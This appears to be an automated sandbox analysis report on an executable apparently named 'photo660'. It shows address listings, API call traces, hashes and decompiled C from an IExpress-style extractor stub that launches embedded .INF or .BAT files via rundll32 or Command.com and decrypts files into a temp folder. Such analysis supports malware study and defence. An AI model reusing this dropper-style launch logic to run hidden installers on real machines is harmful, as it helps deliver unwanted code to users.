                                                                                                                                                                                                        0x00bc3e70
                                                                                                                                                                                                        0x00bc3e74
                                                                                                                                                                                                        0x00bc3e7c
                                                                                                                                                                                                        0x00bc3e80
                                                                                                                                                                                                        0x00bc3e82
                                                                                                                                                                                                        0x00bc3e82
                                                                                                                                                                                                        0x00bc3e87
                                                                                                                                                                                                        0x00bc3e87
                                                                                                                                                                                                        0x00bc3e8b
                                                                                                                                                                                                        0x00bc3e91
                                                                                                                                                                                                        0x00bc3e94
                                                                                                                                                                                                        0x00bc3e96
                                                                                                                                                                                                        0x00bc3e96
                                                                                                                                                                                                        0x00bc3e9b
                                                                                                                                                                                                        0x00bc3e9b
                                                                                                                                                                                                        0x00bc3e9f
                                                                                                                                                                                                        0x00bc3ea2
                                                                                                                                                                                                        0x00bc3ea4
                                                                                                                                                                                                        0x00bc3ea4
                                                                                                                                                                                                        0x00bc3ea9
                                                                                                                                                                                                        0x00bc3ea9
                                                                                                                                                                                                        0x00bc3ead
                                                                                                                                                                                                        0x00bc3eb3
                                                                                                                                                                                                        0x00bc3eb6
                                                                                                                                                                                                        0x00bc3eb8
                                                                                                                                                                                                        0x00bc3eb8
                                                                                                                                                                                                        0x00bc3ebd
                                                                                                                                                                                                        0x00bc3ebd
                                                                                                                                                                                                        0x00bc3ec1
                                                                                                                                                                                                        0x00bc3ec3
                                                                                                                                                                                                        0x00bc3ec5
                                                                                                                                                                                                        0x00bc3ec5
                                                                                                                                                                                                        0x00bc3eca
                                                                                                                                                                                                        0x00bc3eca
                                                                                                                                                                                                        0x00bc3ece
                                                                                                                                                                                                        0x00bc3ed5
                                                                                                                                                                                                        0x00bc3ed9
                                                                                                                                                                                                        0x00bc3ee0
                                                                                                                                                                                                        0x00bc3ee6
                                                                                                                                                                                                        0x00bc3eea
                                                                                                                                                                                                        0x00bc3eec
                                                                                                                                                                                                        0x00bc3eee
                                                                                                                                                                                                        0x00bc3ef3
                                                                                                                                                                                                        0x00bc3ef3
                                                                                                                                                                                                        0x00bc3ef5
                                                                                                                                                                                                        0x00bc3efa
                                                                                                                                                                                                        0x00bc3efb
                                                                                                                                                                                                        0x00bc3efd
                                                                                                                                                                                                        0x00bc3f40
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3eff
                                                                                                                                                                                                        0x00bc3eff
                                                                                                                                                                                                        0x00bc3f05
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3f05
                                                                                                                                                                                                        0x00bc3efd
                                                                                                                                                                                                        0x00bc3dc7
                                                                                                                                                                                                        0x00bc3dce
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3dd0
                                                                                                                                                                                                        0x00bc3dd7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3dd9
                                                                                                                                                                                                        0x00bc3ddb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3ddd
                                                                                                                                                                                                        0x00bc3de1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3de1
                                                                                                                                                                                                        0x00bc3d59
                                                                                                                                                                                                        0x00bc3d65
                                                                                                                                                                                                        0x00bc3d6a
                                                                                                                                                                                                        0x00bc3d6c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3d6e
                                                                                                                                                                                                        0x00bc3d75
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3d8f
                                                                                                                                                                                                        0x00bc3d96
                                                                                                                                                                                                        0x00bc3d98
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3d98
                                                                                                                                                                                                        0x00bc3c8f
                                                                                                                                                                                                        0x00bc3c98

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 00BC3C11
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00BC3CDC
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00BC46A0
                                                                                                                                                                                                          • Part of subcall function 00BC468F: SizeofResource.KERNEL32(00000000,00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46A9
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00BC46C3
                                                                                                                                                                                                          • Part of subcall function 00BC468F: LoadResource.KERNEL32(00000000,00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46CC
                                                                                                                                                                                                          • Part of subcall function 00BC468F: LockResource.KERNEL32(00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46D3
                                                                                                                                                                                                          • Part of subcall function 00BC468F: memcpy_s.MSVCRT ref: 00BC46E5
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46EF
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00BC8C42), ref: 00BC3D8F
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00BC3E26
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00BC8C42), ref: 00BC3EFF
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00BC8C42), ref: 00BC3F1F
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00BC8C42), ref: 00BC3F40
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00BC8C42), ref: 00BC3F47
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00BC8C42), ref: 00BC3F76
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00BC8C42), ref: 00BC3F80
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00BC8C42), ref: 00BC3FC2
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
• Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                        • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$photo660
                                                                                                                                                                                                        • API String ID: 1032054927-272976373
                                                                                                                                                                                                        • Opcode ID: 38b39775c68f3960719163464c8e88720dc3c540047b1c24b9497a6f17962d6e
                                                                                                                                                                                                        • Instruction ID: 51ac02b45475e0fa38d924338fabf0f5a44b7542f3155222adb46682840e4aa9
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38b39775c68f3960719163464c8e88720dc3c540047b1c24b9497a6f17962d6e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2B1E4706043019BE720DF248885F6B77E4EB89B54F5089ADFA96E7191DB70CE44CBA2
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

[Figure: control-flow graph; legend: Executed, Not Executed]
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00BC1AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v527;
                                                                                                                                                                                                        				char _v528;
                                                                                                                                                                                                        				char _v1552;
                                                                                                                                                                                                        				CHAR* _v1556;
                                                                                                                                                                                                        				int* _v1560;
                                                                                                                                                                                                        				CHAR** _v1564;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t48;
                                                                                                                                                                                                        				CHAR* _t53;
                                                                                                                                                                                                        				CHAR* _t54;
                                                                                                                                                                                                        				char* _t57;
                                                                                                                                                                                                        				char* _t58;
                                                                                                                                                                                                        				CHAR* _t60;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				signed char _t65;
                                                                                                                                                                                                        				intOrPtr _t76;
                                                                                                                                                                                                        				intOrPtr _t77;
                                                                                                                                                                                                        				unsigned int _t85;
                                                                                                                                                                                                        				CHAR* _t90;
                                                                                                                                                                                                        				CHAR* _t92;
                                                                                                                                                                                                        				char _t105;
                                                                                                                                                                                                        				char _t106;
                                                                                                                                                                                                        				CHAR** _t111;
                                                                                                                                                                                                        				CHAR* _t115;
                                                                                                                                                                                                        				intOrPtr* _t125;
                                                                                                                                                                                                        				void* _t126;
                                                                                                                                                                                                        				CHAR* _t132;
                                                                                                                                                                                                        				CHAR* _t135;
                                                                                                                                                                                                        				void* _t138;
                                                                                                                                                                                                        				void* _t139;
                                                                                                                                                                                                        				void* _t145;
                                                                                                                                                                                                        				intOrPtr* _t146;
                                                                                                                                                                                                        				char* _t148;
                                                                                                                                                                                                        				CHAR* _t151;
                                                                                                                                                                                                        				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0xbc8004; // 0x9f7d84ca
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E00BC1680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00BC1A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00BC1781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
					E00BC658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00BC1680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E00BC66C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E00BC66C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00BC1680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00BC1781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E00BC16B3( &_v1552, 0x400, " ");
										E00BC16B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00BC2AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E00BC171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00BC1A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00BC1A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E00BC44B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0xbc9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xbc1140, _t156, 8,  &_v268) == 0) {
										 *0xbc9a34 =  *0xbc9a34 & 0xfffffffb;
										if( *0xbc9a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E00BC171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0xbc9a34 =  *0xbc9a34 | 0x00000004;
										if( *_t155 == 0) {
                                                                                                                                                                                                        											_t155 = "DefaultInstall";
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										E00BC1680(_t108, 0x104, _t155);
                                                                                                                                                                                                        										_t140 = 0x200;
                                                                                                                                                                                                        										E00BC1680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									L53:
                                                                                                                                                                                                        									_t62 = 1;
                                                                                                                                                                                                        									 *_v1564 = _t156;
                                                                                                                                                                                                        									L54:
                                                                                                                                                                                                        									_pop(_t152);
                                                                                                                                                                                                        									return E00BC6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}














































                                                                                                                                                                                                        0x00bc1c72
                                                                                                                                                                                                        0x00bc1c74
                                                                                                                                                                                                        0x00bc1c74
                                                                                                                                                                                                        0x00bc1c8e
                                                                                                                                                                                                        0x00bc1c99
                                                                                                                                                                                                        0x00bc1cc0
                                                                                                                                                                                                        0x00bc1cf8
                                                                                                                                                                                                        0x00bc1d07
                                                                                                                                                                                                        0x00bc1d23
                                                                                                                                                                                                        0x00bc1d09
                                                                                                                                                                                                        0x00bc1d14
                                                                                                                                                                                                        0x00bc1d1b
                                                                                                                                                                                                        0x00bc1d1b
                                                                                                                                                                                                        0x00bc1d2b
                                                                                                                                                                                                        0x00bc1d2d
                                                                                                                                                                                                        0x00bc1d2d
                                                                                                                                                                                                        0x00bc1d38
                                                                                                                                                                                                        0x00bc1d39
                                                                                                                                                                                                        0x00bc1d46
                                                                                                                                                                                                        0x00bc1cc2
                                                                                                                                                                                                        0x00bc1cc2
                                                                                                                                                                                                        0x00bc1ccc
                                                                                                                                                                                                        0x00bc1cce
                                                                                                                                                                                                        0x00bc1cce
                                                                                                                                                                                                        0x00bc1cdb
                                                                                                                                                                                                        0x00bc1ce6
                                                                                                                                                                                                        0x00bc1cee
                                                                                                                                                                                                        0x00bc1cee
                                                                                                                                                                                                        0x00bc1e89
                                                                                                                                                                                                        0x00bc1e91
                                                                                                                                                                                                        0x00bc1e92
                                                                                                                                                                                                        0x00bc1e94
                                                                                                                                                                                                        0x00bc1e97
                                                                                                                                                                                                        0x00bc1ea4
                                                                                                                                                                                                        0x00bc1ea4
                                                                                                                                                                                                        0x00bc1c61
                                                                                                                                                                                                        0x00bc1c07
                                                                                                                                                                                                        0x00bc1bd3
                                                                                                                                                                                                        0x00bc1b7b

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00BC1BE7
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00BC1BFE
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00BC1C57
                                                                                                                                                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 00BC1C88
                                                                                                                                                                                                        • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00BC1140,00000000,00000008,?), ref: 00BC1CB8
                                                                                                                                                                                                        • GetShortPathNameA.KERNEL32 ref: 00BC1D1B
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00BC4518
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00BC4554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                        • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                        • API String ID: 383838535-2112662285
                                                                                                                                                                                                        • Opcode ID: d0e639f956b830f32e1fbc52dc05897b4cb9d26c830f014d52a4a7a65f8aaafc
                                                                                                                                                                                                        • Instruction ID: 2d2995dbcda10c980aea3090b2361eead0a98e825033542b17ee8a9be65821cb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0e639f956b830f32e1fbc52dc05897b4cb9d26c830f014d52a4a7a65f8aaafc
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CDA12870A002186BEB209B2CCC45FEA77E9DB57310F144AEDE556F32D2DBB49D858B60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph (function 00BC2F1D; legend: Executed / Not Executed)
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00BC2F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v272;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				struct HWND__* _t12;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				signed int _t22;
                                                                                                                                                                                                        				signed int _t25;
                                                                                                                                                                                                        				intOrPtr* _t26;
                                                                                                                                                                                                        				signed int _t27;
                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                                                                        				intOrPtr* _t44;
                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                        				int _t47;
                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                        				void* _t59;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t43 = __edx;
                                                                                                                                                                                                        				_t9 =  *0xbc8004; // 0x9f7d84ca
                                                                                                                                                                                                        				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                        				if( *0xbc8a38 != 0) {
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					_t11 = E00BC5164(_t52);
                                                                                                                                                                                                        					_t53 = _t11;
                                                                                                                                                                                                        					if(_t11 == 0) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						_t12 = 0;
                                                                                                                                                                                                        						L17:
                                                                                                                                                                                                        						return E00BC6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t14 = E00BC55A0(_t53); // executed
                                                                                                                                                                                                        					if(_t14 == 0) {
                                                                                                                                                                                                        						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E00BC658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0xbca288("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0xbc8a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0xbc8a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0xbc8d48 & 0x000000c0;
									if(( *0xbc8d48 & 0x000000c0) == 0) {
										_t41 =  *0xbc9a40; // 0x3, executed
										_t26 = E00BC256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0xbc8a24; // 0x0
									 *0xbc9a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0xbc8a38;
										if( *0xbc8a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E00BC4169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0xbc9a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E00BC3BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0xbc8a24; // 0x0
										goto L26;
									}
								}
								_t27 = E00BC3B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E00BC44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0xbc9124 = E00BC6285();
							goto L16;
						}
						_t59 =  *0xbc9a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E00BC621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0xbc8a24;
				if( *0xbc8a24 != 0) {
					L4:
					_t34 = E00BC3A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E00BC51E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0xbc8a38;
				if( *0xbc8a38 != 0) {
					goto L5;
				}
				goto L4;
			}

                                                                                                                                                                                                        0x00bc30a1
                                                                                                                                                                                                        0x00bc30a9
                                                                                                                                                                                                        0x00bc30ab
                                                                                                                                                                                                        0x00bc30ad
                                                                                                                                                                                                        0x00bc30af
                                                                                                                                                                                                        0x00bc30af
                                                                                                                                                                                                        0x00bc30ad
                                                                                                                                                                                                        0x00bc30b6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc308b
                                                                                                                                                                                                        0x00bc308b
                                                                                                                                                                                                        0x00bc3091
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3093
                                                                                                                                                                                                        0x00bc3098
                                                                                                                                                                                                        0x00bc309a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc309c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc309c
                                                                                                                                                                                                        0x00bc3089
                                                                                                                                                                                                        0x00bc305c
                                                                                                                                                                                                        0x00bc3061
                                                                                                                                                                                                        0x00bc3063
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3063
                                                                                                                                                                                                        0x00bc302b
                                                                                                                                                                                                        0x00bc3032
                                                                                                                                                                                                        0x00bc303c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc303c
                                                                                                                                                                                                        0x00bc3006
                                                                                                                                                                                                        0x00bc300c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc300e
                                                                                                                                                                                                        0x00bc3015
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3015
                                                                                                                                                                                                        0x00bc2f80
                                                                                                                                                                                                        0x00bc2f3f
                                                                                                                                                                                                        0x00bc2f46
                                                                                                                                                                                                        0x00bc2f5f
                                                                                                                                                                                                        0x00bc2f5f
                                                                                                                                                                                                        0x00bc2f64
                                                                                                                                                                                                        0x00bc2f66
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2f66
                                                                                                                                                                                                        0x00bc2f4f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2f55
                                                                                                                                                                                                        0x00bc2f5d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00BC2F93
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00BC2FB2
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00BC2FC6
                                                                                                                                                                                                        • DecryptFileA.ADVAPI32 ref: 00BC2FE6
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00BC2FF8
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00BC301C
                                                                                                                                                                                                          • Part of subcall function 00BC51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00BC2F4D,?,00000002,00000000), ref: 00BC5201
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
